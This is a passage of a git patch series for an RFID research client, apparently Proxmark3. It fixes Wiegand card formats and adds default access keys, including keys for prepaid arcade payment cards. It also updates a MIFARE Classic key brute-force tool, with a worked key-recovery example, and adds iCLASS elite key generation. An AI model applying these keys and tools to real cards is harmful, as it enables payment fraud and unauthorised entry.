Smartcard Project // Provision of Citizen Services #1", "Type": "transport" }, @@ -803,7 +803,7 @@ "AID": "F40111", "Vendor": "ITSO Ltd", "Country": "UK", - "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Name": "EMR Smartcard (EMA) / GWR touch (BRS)", "Description": "UK National Smartcard Project // Provision of Citizen Services #2", "Type": "transport" }, @@ -811,7 +811,7 @@ "AID": "F40112", "Vendor": "ITSO Ltd", "Country": "UK", - "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Name": "EMR Smartcard (EMA) / GWR touch (BRS)", "Description": "UK National Smartcard Project // Provision of Citizen Services #3", "Type": "transport" }, @@ -819,7 +819,7 @@ "AID": "F40113", "Vendor": "ITSO Ltd", "Country": "UK", - "Name": "EMR Smartcard (EMA) / GWR touch (SWI)", + "Name": "EMR Smartcard (EMA) / GWR touch (BRS)", "Description": "UK National Smartcard Project // Provision of Citizen Services #4", "Type": "transport" }, From 4124dcdce9efac16a1908a0fcb2c389ee84b43e6 Mon Sep 17 00:00:00 2001 From: Jean-Michel Picod Date: Thu, 4 Jul 2024 12:02:32 +0200 Subject: [PATCH 068/112] Fix a few mistaked in Wiegand encodings --- client/src/wiegand_formats.c | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/client/src/wiegand_formats.c b/client/src/wiegand_formats.c index fc14f2bb6..9c3a09c31 100644 --- a/client/src/wiegand_formats.c +++ b/client/src/wiegand_formats.c @@ -154,7 +154,7 @@ static bool Pack_indasc27(wiegand_card_t *card, wiegand_message_t *packed, bool if (card->OEM > 0) return false; // Not used in this format packed->Length = 27; - set_nonlinear_field(packed, card->FacilityCode, 11, (uint8_t[]) {9, 4, 6, 5, 0, 7, 19, 8, 10, 16, 24, 12, 22}); + set_nonlinear_field(packed, card->FacilityCode, 13, (uint8_t[]) {9, 4, 6, 5, 0, 7, 19, 8, 10, 16, 24, 12, 22}); set_nonlinear_field(packed, card->CardNumber, 14, (uint8_t[]) {26, 1, 3, 15, 14, 17, 20, 13, 25, 2, 18, 21, 11, 23}); if (preamble) return add_HID_header(packed); @@ -166,7 +166,7 @@ static bool Unpack_indasc27(wiegand_message_t *packed, wiegand_card_t *card) { if (packed->Length != 27) return false; // Wrong length? Stop here. - card->FacilityCode = get_nonlinear_field(packed, 11, (uint8_t[]) {9, 4, 6, 5, 0, 7, 19, 8, 10, 16, 24, 12, 22}); + card->FacilityCode = get_nonlinear_field(packed, 13, (uint8_t[]) {9, 4, 6, 5, 0, 7, 19, 8, 10, 16, 24, 12, 22}); card->CardNumber = get_nonlinear_field(packed, 14, (uint8_t[]) {26, 1, 3, 15, 14, 17, 20, 13, 25, 2, 18, 21, 11, 23}); return true; } @@ -1178,7 +1178,7 @@ static bool Pack_iscs38(wiegand_card_t *card, wiegand_message_t *packed, bool pr set_linear_field(packed, card->FacilityCode, 5, 10); set_linear_field(packed, card->CardNumber, 15, 22); - set_linear_field(packed, card->IssueLevel, 1, 4); + set_linear_field(packed, card->OEM, 1, 4); set_bit_by_position(packed, evenparity32(get_linear_field(packed, 1, 18)) @@ -1257,7 +1257,7 @@ static bool Pack_bc40(wiegand_card_t *card, wiegand_message_t *packed, bool prea if (card->IssueLevel > 0) return false; // Not used in this format if (card->OEM > 0x7F) return false; // Not used in this format - packed->Length = 39; // Set number of bits + packed->Length = 40; // Set number of bits set_linear_field(packed, card->OEM, 0, 7); @@ -1277,7 +1277,7 @@ static bool Pack_bc40(wiegand_card_t *card, wiegand_message_t *packed, bool prea static bool Unpack_bc40(wiegand_message_t *packed, wiegand_card_t *card) { memset(card, 0, sizeof(wiegand_card_t)); - if (packed->Length != 39) return false; // Wrong length? Stop here. + if (packed->Length != 40) return false; // Wrong length? Stop here. card->OEM = get_linear_field(packed, 0, 7); card->FacilityCode = get_linear_field(packed, 7, 12); From 78c5ddf8d709652581eab5d76e4fa531a3e30fc5 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sun, 7 Jul 2024 08:34:33 +1000 Subject: [PATCH 069/112] Added Sample ULC Access Key Reference: https://fcc.report/FCC-ID/G7H-SPRFTR001/5047018.pdf The third sample access key is added by me because the documentation placed a `00 [null]` as the last byte instead of `46 [F]`. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/dictionaries/mfulc_default_keys.dic | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/client/dictionaries/mfulc_default_keys.dic b/client/dictionaries/mfulc_default_keys.dic index 09dea8caf..112dda7e1 100644 --- a/client/dictionaries/mfulc_default_keys.dic +++ b/client/dictionaries/mfulc_default_keys.dic @@ -3,4 +3,6 @@ # -- iceman fork version -- # -- contribute to this list, sharing is caring -- # -425245414B4D454946594F5543414E21 # Sample Key (BREAKMEIFYOUCAN!) +425245414B4D454946594F5543414E21 # Sample Key (BREAKMEIFYOUCAN!) +49454D4B41455242214E4143554F5900 # Sample Key (IEMKAERB!NACUO) +49454D4B41455242214E4143554F5946 # Sample Key (IEMKAERB!NACUOY) From 9d9a49f2685123eea21d6139e83854e498a0c3e3 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sun, 7 Jul 2024 08:35:22 +1000 Subject: [PATCH 070/112] Update mfulc_default_keys.dic Fixed typo. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/dictionaries/mfulc_default_keys.dic | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/client/dictionaries/mfulc_default_keys.dic b/client/dictionaries/mfulc_default_keys.dic index 112dda7e1..4115d3704 100644 --- a/client/dictionaries/mfulc_default_keys.dic +++ b/client/dictionaries/mfulc_default_keys.dic @@ -4,5 +4,5 @@ # -- contribute to this list, sharing is caring -- # 425245414B4D454946594F5543414E21 # Sample Key (BREAKMEIFYOUCAN!) -49454D4B41455242214E4143554F5900 # Sample Key (IEMKAERB!NACUO) -49454D4B41455242214E4143554F5946 # Sample Key (IEMKAERB!NACUOY) +49454D4B41455242214E4143554F5900 # Sample Key (IEMKAERB!NACUOY) +49454D4B41455242214E4143554F5946 # Sample Key (IEMKAERB!NACUOYF) From 6f80b5ac2f97801c6088159b0d150a9c79999bc7 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sun, 7 Jul 2024 08:51:53 +1000 Subject: [PATCH 071/112] Update mfulc_default_keys.dic Added additonal sample keys based on how a company decided to modify the sample key as the basis for theirs; it stands to reason that if one company did that, then another company very well could have done the same. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/dictionaries/mfulc_default_keys.dic | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/client/dictionaries/mfulc_default_keys.dic b/client/dictionaries/mfulc_default_keys.dic index 4115d3704..8d42fe113 100644 --- a/client/dictionaries/mfulc_default_keys.dic +++ b/client/dictionaries/mfulc_default_keys.dic @@ -3,6 +3,8 @@ # -- iceman fork version -- # -- contribute to this list, sharing is caring -- # -425245414B4D454946594F5543414E21 # Sample Key (BREAKMEIFYOUCAN!) -49454D4B41455242214E4143554F5900 # Sample Key (IEMKAERB!NACUOY) -49454D4B41455242214E4143554F5946 # Sample Key (IEMKAERB!NACUOYF) +12E4143455F495649454D4B414542524 # ( 4U d T T%$) Hexadecimal-Reversed Sample Key +214E4143554F594649454D4B41455242 # (!NACUOYFIEMKAERB) Byte-Reversed Sample Key +425245414B4D454946594F5543414E21 # (BREAKMEIFYOUCAN!) Sample Key +49454D4B41455242214E4143554F5900 # (IEMKAERB!NACUOY ) Semnox Key +49454D4B41455242214E4143554F5946 # (IEMKAERB!NACUOYF) Modified Semnox Key From ba6b0705849969a5681a571dcb958d733800e033 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sun, 7 Jul 2024 10:19:55 +1000 Subject: [PATCH 072/112] Update mfc_default_keys.dic Added static guest access keys for various cashless prepaid arcade payment cards. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/dictionaries/mfc_default_keys.dic | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index 5856c598c..d225108b3 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2205,6 +2205,13 @@ C8382A233993 7B304F2A12A6 FC9418BF788B # +# Guest Cashless Prepaid Arcade Payment Cards +168168168168 +198407157610 +4E4F584D12101 +4E4F584D12105 +686B35333376 +861861861861 # Data from "the more the marriott" mifare project (colonelborkmundus) # aka The Horde # From d1e76d90cbf6d370e4a27d6310e11ddaf93ebfd6 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sun, 7 Jul 2024 10:38:32 +1000 Subject: [PATCH 073/112] Update aid_desfire.json Restored Disney MagicBand AID, noting that NXP TagInfo claimed that this AID is an unknown application instead of a Disney MagicBand. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 237db3297..964590699 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -431,6 +431,14 @@ "Description": "", "Type": "student" }, + { + "AID": "27E178", + "Vendor": "Disney", + "Country": "US", + "Name": "Disney MagicBand", + "Description": "", + "Type": "payment system" + } { "AID": "44434C", "Vendor": "Disney", From 53194324452241a2424c276a5b2c25d53048ff38 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sun, 7 Jul 2024 10:40:33 +1000 Subject: [PATCH 074/112] Update aid_desfire.json Formatting fixes. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 964590699..bfff4b5b3 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -438,7 +438,7 @@ "Name": "Disney MagicBand", "Description": "", "Type": "payment system" - } + }, { "AID": "44434C", "Vendor": "Disney", From e5f1487804d4edc9d5e9ce9506d6085de03339d3 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Mon, 8 Jul 2024 08:11:24 +1000 Subject: [PATCH 075/112] Update mfc_default_keys.dic Corrected a typing error that resulted in two 13-hexadecimal character access keys. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/dictionaries/mfc_default_keys.dic | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index d225108b3..c849c63fe 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2208,8 +2208,8 @@ FC9418BF788B # Guest Cashless Prepaid Arcade Payment Cards 168168168168 198407157610 -4E4F584D12101 -4E4F584D12105 +4E4F584D2101 +4E4F584D2105 686B35333376 861861861861 # Data from "the more the marriott" mifare project (colonelborkmundus) From 1f74f80de1cd62a4d7a8ce77833c77a91328a77f Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Mon, 8 Jul 2024 08:14:26 +1000 Subject: [PATCH 076/112] Update aid_desfire.json Corrected the IST Istanbul name. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index bfff4b5b3..263d30f58 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -531,7 +531,7 @@ "AID": "012242", "Vendor": "Belbim", "Country": "TR", - "Name": "Istanbulkart (IST)", + "Name": "İstanbulkart (IST)", "Description": "IST Istanbul Card (eBilet App)", "Type": "transport" }, @@ -579,7 +579,7 @@ "AID": "052242", "Vendor": "Belbim", "Country": "TR", - "Name": "Istanbulkart (IST)", + "Name": "İstanbulkart (IST)", "Description": "IST Istanbul Card (ISPARK App)", "Type": "transport" }, @@ -595,7 +595,7 @@ "AID": "062242", "Vendor": "Belbim", "Country": "TR", - "Name": "Istanbulkart (IST)", + "Name": "İstanbulkart (IST)", "Description": "IST Istanbul Card (App 6)", "Type": "transport" }, From 06203a8c5f6ed03437f958cd0a3a3ddd9c1beefb Mon Sep 17 00:00:00 2001 From: Jean-Michel Picod Date: Tue, 9 Jul 2024 14:02:20 +0200 Subject: [PATCH 077/112] Fix invalid Wiegand format flags. Some formats were declared with not adequate flags resulting in the format being filtered out for encoding/decoding unless explictly setting it. --- client/src/wiegand_formats.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/client/src/wiegand_formats.c b/client/src/wiegand_formats.c index 9c3a09c31..f0e230bab 100644 --- a/client/src/wiegand_formats.c +++ b/client/src/wiegand_formats.c @@ -1433,12 +1433,12 @@ static const cardformat_t FormatTable[] = { {"ind26", Pack_ind26, Unpack_ind26, "Indala 26-bit", {1, 1, 0, 0, 1}}, // from cardinfo.barkweb.com.au {"ind27", Pack_ind27, Unpack_ind27, "Indala 27-bit", {1, 1, 0, 0, 0}}, // from cardinfo.barkweb.com.au {"indasc27", Pack_indasc27, Unpack_indasc27, "Indala ASC 27-bit", {1, 1, 0, 0, 0}}, // from cardinfo.barkweb.com.au - {"Tecom27", Pack_Tecom27, Unpack_Tecom27, "Tecom 27-bit", {1, 1, 0, 0, 1}}, // from cardinfo.barkweb.com.au + {"Tecom27", Pack_Tecom27, Unpack_Tecom27, "Tecom 27-bit", {1, 1, 0, 0, 0}}, // from cardinfo.barkweb.com.au {"2804W", Pack_2804W, Unpack_2804W, "2804 Wiegand 28-bit", {1, 1, 0, 0, 1}}, // from cardinfo.barkweb.com.au {"ind29", Pack_ind29, Unpack_ind29, "Indala 29-bit", {1, 1, 0, 0, 0}}, // from cardinfo.barkweb.com.au {"ATSW30", Pack_ATSW30, Unpack_ATSW30, "ATS Wiegand 30-bit", {1, 1, 0, 0, 1}}, // from cardinfo.barkweb.com.au {"ADT31", Pack_ADT31, Unpack_ADT31, "HID ADT 31-bit", {1, 1, 0, 0, 0}}, // from cardinfo.barkweb.com.au - {"HCP32", Pack_hcp32, Unpack_hcp32, "HID Check Point 32-bit", {1, 1, 0, 0, 0}}, // from cardinfo.barkweb.com.au + {"HCP32", Pack_hcp32, Unpack_hcp32, "HID Check Point 32-bit", {1, 0, 0, 0, 0}}, // from cardinfo.barkweb.com.au {"HPP32", Pack_hpp32, Unpack_hpp32, "HID Hewlett-Packard 32-bit", {1, 1, 0, 0, 0}}, // from cardinfo.barkweb.com.au {"Kastle", Pack_Kastle, Unpack_Kastle, "Kastle 32-bit", {1, 1, 1, 0, 1}}, // from @xilni; PR #23 on RfidResearchGroup/proxmark3 {"Kantech", Pack_Kantech, Unpack_Kantech, "Indala/Kantech KFS 32-bit", {1, 1, 0, 0, 0}}, // from cardinfo.barkweb.com.au @@ -1462,7 +1462,7 @@ static const cardformat_t FormatTable[] = { {"BQT38", Pack_bqt38, Unpack_bqt38, "BQT 38-bit", {1, 1, 1, 0, 1}}, // from cardinfo.barkweb.com.au {"ISCS", Pack_iscs38, Unpack_iscs38, "ISCS 38-bit", {1, 1, 0, 1, 1}}, // from cardinfo.barkweb.com.au {"PW39", Pack_pw39, Unpack_pw39, "Pyramid 39-bit wiegand format", {1, 1, 0, 0, 1}}, // from cardinfo.barkweb.com.au - {"P10001", Pack_P10001, Unpack_P10001, "HID P10001 Honeywell 40-bit", {1, 1, 0, 1, 0}}, // from cardinfo.barkweb.com.au + {"P10001", Pack_P10001, Unpack_P10001, "HID P10001 Honeywell 40-bit", {1, 1, 0, 0, 0}}, // from cardinfo.barkweb.com.au {"Casi40", Pack_CasiRusco40, Unpack_CasiRusco40, "Casi-Rusco 40-bit", {1, 0, 0, 0, 0}}, // from cardinfo.barkweb.com.au {"C1k48s", Pack_C1k48s, Unpack_C1k48s, "HID Corporate 1000 48-bit std", {1, 1, 0, 0, 1}}, // imported from old pack/unpack {"BC40", Pack_bc40, Unpack_bc40, "Bundy TimeClock 40-bit", {1, 1, 0, 1, 1}}, // from From 2a86a86a062f0097bd3a75b0e4918b89576a0a42 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Wed, 10 Jul 2024 11:04:23 +0200 Subject: [PATCH 078/112] updated format --- client/src/wiegand_formats.c | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/client/src/wiegand_formats.c b/client/src/wiegand_formats.c index f0e230bab..eddf28621 100644 --- a/client/src/wiegand_formats.c +++ b/client/src/wiegand_formats.c @@ -591,7 +591,11 @@ static bool Pack_H10320(wiegand_card_t *card, wiegand_message_t *packed, bool pr if (card->IssueLevel > 0) return false; // Not used in this format if (card->OEM > 0) return false; // Not used in this format - packed->Length = 36; // Set number of bits + packed->Length = 37; // Set number of bits + + // first bit is ONE. + set_bit_by_position(packed, 1, 0); + // This card is BCD-encoded rather than binary. Set the 4-bit groups independently. for (uint32_t idx = 0; idx < 8; idx++) { set_linear_field(packed, (uint64_t)(card->CardNumber / pow(10, 7 - idx)) % 10, idx * 4, 4); @@ -616,7 +620,10 @@ static bool Pack_H10320(wiegand_card_t *card, wiegand_message_t *packed, bool pr static bool Unpack_H10320(wiegand_message_t *packed, wiegand_card_t *card) { memset(card, 0, sizeof(wiegand_card_t)); - if (packed->Length != 36) return false; // Wrong length? Stop here. + if (packed->Length != 37) return false; // Wrong length? Stop here. + if (get_bit_by_position(packed, 0) != 1) { + return false; + } // This card is BCD-encoded rather than binary. Get the 4-bit groups independently. for (uint32_t idx = 0; idx < 8; idx++) { @@ -1453,7 +1460,7 @@ static const cardformat_t FormatTable[] = { {"C15001", Pack_C15001, Unpack_C15001, "HID KeyScan 36-bit", {1, 1, 0, 1, 1}}, // from Proxmark forums {"S12906", Pack_S12906, Unpack_S12906, "HID Simplex 36-bit", {1, 1, 1, 0, 1}}, // from cardinfo.barkweb.com.au {"Sie36", Pack_Sie36, Unpack_Sie36, "HID 36-bit Siemens", {1, 1, 0, 0, 1}}, // from cardinfo.barkweb.com.au - {"H10320", Pack_H10320, Unpack_H10320, "HID H10320 36-bit BCD", {1, 0, 0, 0, 1}}, // from Proxmark forums + {"H10320", Pack_H10320, Unpack_H10320, "HID H10320 37-bit BCD", {1, 0, 0, 0, 1}}, // from Proxmark forums {"H10302", Pack_H10302, Unpack_H10302, "HID H10302 37-bit huge ID", {1, 0, 0, 0, 1}}, // from Proxmark forums {"H10304", Pack_H10304, Unpack_H10304, "HID H10304 37-bit", {1, 1, 0, 0, 1}}, // from cardinfo.barkweb.com.au {"P10004", Pack_P10004, Unpack_P10004, "HID P10004 37-bit PCSC", {1, 1, 0, 0, 0}}, // from @bthedorff; PR #1559 From 05b50a6c264d9a86a9e72f36e8aa53b2b0334bc5 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Thu, 11 Jul 2024 10:57:19 +0200 Subject: [PATCH 079/112] fix #2418 - the tool mf_nonce_brute has in some odd cases when bruteforcing the last upper 16 bits a chance of actually decrypt the four bytes into a valid mifare classic protocol command with a valid ISO14443-a CRC. See github issue for example.\n We now bruteforce all 0xFFFF keyspace and keep track of how many candidates was found. The output has been improved to help user in this case too. --- CHANGELOG.md | 1 + tools/mf_nonce_brute/mf_nonce_brute.c | 27 ++++++++++++++++----------- 2 files changed, 17 insertions(+), 11 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 98797cc01..cc47f0156 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,6 +3,7 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] +- Changed `mf_nonce_brute` tool to handle the odd case of multiple key candidates (@iceman1001) - Fixed a bad memory erase (@iceman1001) - Fixed BT serial comms (@iceman1001) - Changed `intertic.py` - updated and code clean up (@gentilkiwi) diff --git a/tools/mf_nonce_brute/mf_nonce_brute.c b/tools/mf_nonce_brute/mf_nonce_brute.c index 1c00f4eef..2e10ccbf1 100644 --- a/tools/mf_nonce_brute/mf_nonce_brute.c +++ b/tools/mf_nonce_brute/mf_nonce_brute.c @@ -560,9 +560,9 @@ static void *brute_thread(void *arguments) { pthread_mutex_unlock(&print_lock); free(revstate); continue; - } else { - printf("<-- " _GREEN_("valid cmd") "\n"); } + + printf("<-- " _GREEN_("valid cmd") "\n"); } lfsr_rollback_word(revstate, 0, 0); @@ -591,6 +591,7 @@ static void *brute_thread(void *arguments) { return NULL; } +// Bruteforce the upper 16 bits of the key static void *brute_key_thread(void *arguments) { struct thread_key_args *args = (struct thread_key_args *) arguments; @@ -600,10 +601,6 @@ static void *brute_key_thread(void *arguments) { for (uint64_t count = args->idx; count <= 0xFFFF; count += thread_count) { - if (__atomic_load_n(&global_found, __ATOMIC_ACQUIRE) == 1) { - break; - } - key = args->part_key | (count << 32); // Init cipher with key @@ -628,15 +625,20 @@ static void *brute_key_thread(void *arguments) { continue; } - __sync_fetch_and_add(&global_found, 1); + __sync_fetch_and_add(&global_found_candidate, 1); // lock this section to avoid interlacing prints from different threats pthread_mutex_lock(&print_lock); printf("\nenc: %s\n", sprint_hex_inrow_ex(local_enc, args->enc_len, 0)); printf("dec: %s\n", sprint_hex_inrow_ex(dec, args->enc_len, 0)); - printf("\nValid Key found [ " _GREEN_("%012" PRIx64) " ]\n\n", key); + + if (key == global_candidate_key) { + printf("\nValid Key found [ " _GREEN_("%012" PRIx64) " ] - " _YELLOW_("matches candidate") "\n\n", key); + } else { + printf("\nValid Key found [ " _GREEN_("%012" PRIx64) " ]\n\n", key); + } + pthread_mutex_unlock(&print_lock); - break; } free(args); return NULL; @@ -797,12 +799,12 @@ int main(int argc, const char *argv[]) { } // reset thread signals - global_found = 0; global_found_candidate = 0; printf("\n----------- " _CYAN_("Phase 3 validating") " ----------------------------\n"); printf("uid.................. %08x\n", uid); printf("partial key.......... %08x\n", (uint32_t)(global_candidate_key & 0xFFFFFFFF)); + printf("possible key......... %012" PRIx64 "\n", global_candidate_key); printf("nt enc............... %08x\n", nt_enc); printf("nr enc............... %08x\n", nr_enc); printf("next encrypted cmd... %s\n", sprint_hex_inrow_ex(enc, enc_len, 0)); @@ -828,7 +830,10 @@ int main(int argc, const char *argv[]) { pthread_join(threads[i], NULL); } - if (!global_found && !global_found_candidate) { + if (global_found_candidate > 1) { + printf("\nOdd case but we found " _GREEN_("%d") " possible keys", global_found_candidate); + printf("\n" _YELLOW_("You need to test all of them manually, start with the one matching the candidate\n\n")); + } else { printf("\nfailed to find a key\n\n"); } From 30c4f0a924044fd2b5ff251036f5e77fe28818ce Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Thu, 11 Jul 2024 11:04:40 +0200 Subject: [PATCH 080/112] text --- tools/mf_nonce_brute/README.md | 73 ++++++++++++++++++++++++++++++++++ 1 file changed, 73 insertions(+) diff --git a/tools/mf_nonce_brute/README.md b/tools/mf_nonce_brute/README.md index 440474e73..1b18a1a6a 100644 --- a/tools/mf_nonce_brute/README.md +++ b/tools/mf_nonce_brute/README.md @@ -130,3 +130,76 @@ Valid Key found: [ffffffffffff] Time in mf_nonce_brute (Phase 1): 1763 ticks 2.0 seconds ``` + +[2024-07-11] +There is an odd case where we find multiple valid MIFARE Classic protocol commands with a valid ISO14443-A CRC when decrypting four bytes and are bruteforcing the last upper 16 bit of keyspace in phase 3. + +The command has been updated to give a more informative text in order to help the user understanding and what to do next. + +``` +./mf_nonce_brute fcf77b54 1b456bdd 1110 f215b6 f9eb95e9 0011 bf55d0b1 0000 AAD4126B +``` + + +When running you get the following full output + +``` +./mf_nonce_brute$ ./mf_nonce_brute fcf77b54 1b456bdd 1110 f215b6 f9eb95e9 0011 bf55d0b1 0000 AAD4126B + +Mifare classic nested auth key recovery + +----------- information ------------------------ +uid.................. fcf77b54 +nt encrypted......... 1b456bdd +nt parity err........ 1110 +nr encrypted......... 00f215b6 +ar encrypted......... f9eb95e9 +ar parity err........ 0011 +at encrypted......... bf55d0b1 +at parity err........ 0000 +next encrypted cmd... AAD4126B + +Bruteforce using 8 threads + +----------- Phase 1 pre-processing ------------------------ +Testing default keys using NESTED authentication... + +----------- Phase 2 examine ------------------------------- +Looking for the last bytes of the encrypted tagnonce + +Target old MFC... +CMD enc( aad4126b ) + dec( 302424cf ) <-- valid cmd + +Key candidate [ ....37afcc2b ] +Key candidate [ a70d37afcc2b ] + +execution time 0.47 sec + +----------- Phase 3 validating ---------------------------- +uid.................. fcf77b54 +partial key.......... 37afcc2b +possible key......... a70d37afcc2b +nt enc............... 1b456bdd +nr enc............... 00f215b6 +next encrypted cmd... AAD4126B + +Looking for the upper 16 bits of the key + +enc: AAD4126B +dec: 610BFEDC + +Valid Key found [ 7c2337afcc2b ] + + +enc: AAD4126B +dec: 302424CF + +Valid Key found [ a70d37afcc2b ] - matches candidate + + +Odd case but we found 2 possible keys +You need to test all of them manually, start with the one matching the candidate + +``` + From 96e3e07faa48bf8f20f0a30e37ea9e6dae5fc23d Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Fri, 12 Jul 2024 11:18:17 +0800 Subject: [PATCH 081/112] Implemented VB6 rng for iclass lookup elite key search Ported @bettse work from the Flipper Zero Picopass repository to use the lookup function with the VB6 rng --- CHANGELOG.md | 1 + client/src/cmdhficlass.c | 100 ++++++++++++++++++++++++++++++++------- client/src/cmdhficlass.h | 6 +++ 3 files changed, 90 insertions(+), 17 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index cc47f0156..89143f958 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -10,6 +10,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac - Added `pm3_tears_for_fears.py` - a ISO14443b tear off script by Pierre Granier - Added new t55xx password (002BCFCF) sniffed from cheap cloner (@davidbeauchamp) - Fixed 'hf 14b sim' - now works (@michi-jung) +- Added VB6 Rng for iclass elite keys lookup by porting @bettse work in the Flipper Zero Picopass App (@antiklesys) ## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index ca3451e36..f3bf3fd51 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -3774,29 +3774,84 @@ out: // this method tries to identify in which configuration mode a iCLASS / iCLASS SE reader is in. // Standard or Elite / HighSecurity mode. It uses a default key dictionary list in order to work. +#define INITIAL_SEED 0x429080 // VB6 KDF Seed Value + +// Functions for generating keys using RNG +uint32_t seed = INITIAL_SEED; +uint8_t key_state[8]; +bool prepared = false; + +void picopass_elite_reset(void) { + memset(key_state, 0, sizeof(key_state)); + seed = INITIAL_SEED; + prepared = false; +} + +uint32_t picopass_elite_lcg(void) { + uint32_t mod = 0x1000000; // 2^24 + uint32_t a = 0xFD43FD; + uint32_t c = 0xC39EC3; + + return (a * seed + c) % mod; +} + +uint32_t picopass_elite_rng(void) { + seed = picopass_elite_lcg(); + return seed; +} + +uint8_t picopass_elite_nextByte(void) { + return (picopass_elite_rng() >> 16) & 0xFF; +} + +void picopass_elite_nextKey(uint8_t* key) { + if(prepared) { + for(size_t i = 0; i < 7; i++) { + key_state[i] = key_state[i + 1]; + } + key_state[7] = picopass_elite_nextByte(); + } else { + for(size_t i = 0; i < 8; i++) { + key_state[i] = picopass_elite_nextByte(); + } + prepared = true; + } + memcpy(key, key_state, 8); +} + static int CmdHFiClassLookUp(const char *Cmd) { CLIParserContext *ctx; CLIParserInit(&ctx, "hf iclass lookup", "This command take sniffed trace data and try to recovery a iCLASS Standard or iCLASS Elite key.", "hf iclass lookup --csn 9655a400f8ff12e0 --epurse f0ffffffffffffff --macs 0000000089cb984b -f iclass_default_keys.dic\n" - "hf iclass lookup --csn 9655a400f8ff12e0 --epurse f0ffffffffffffff --macs 0000000089cb984b -f iclass_default_keys.dic --elite" + "hf iclass lookup --csn 9655a400f8ff12e0 --epurse f0ffffffffffffff --macs 0000000089cb984b -f iclass_default_keys.dic --elite\n" + "hf iclass lookup --csn 9655a400f8ff12e0 --epurse f0ffffffffffffff --macs 0000000089cb984b --vb6rng" ); void *argtable[] = { arg_param_begin, - arg_str1("f", "file", "", "Dictionary file with default iclass keys"), + arg_str0("f", "file", "", "Dictionary file with default iclass keys"), arg_str1(NULL, "csn", "", "Specify CSN as 8 hex bytes"), arg_str1(NULL, "epurse", "", "Specify ePurse as 8 hex bytes"), arg_str1(NULL, "macs", "", "MACs"), arg_lit0(NULL, "elite", "Elite computations applied to key"), arg_lit0(NULL, "raw", "no computations applied to key"), + arg_lit0(NULL, "vb6rng", "use the VB6 rng for elite keys instead of a dictionary file"), arg_param_end }; CLIExecWithReturn(ctx, Cmd, argtable, false); + bool use_vb6kdf = arg_get_lit(ctx, 7); int fnlen = 0; char filename[FILE_PATH_SIZE] = {0}; - CLIParamStrToBuf(arg_get_str(ctx, 1), (uint8_t *)filename, FILE_PATH_SIZE, &fnlen); + + bool use_elite = arg_get_lit(ctx, 5); + bool use_raw = arg_get_lit(ctx, 6); + if(use_vb6kdf){ + use_elite = true; + }else{ + CLIParamStrToBuf(arg_get_str(ctx, 1), (uint8_t *)filename, FILE_PATH_SIZE, &fnlen); + } int csn_len = 0; uint8_t csn[8] = {0}; @@ -3834,15 +3889,12 @@ static int 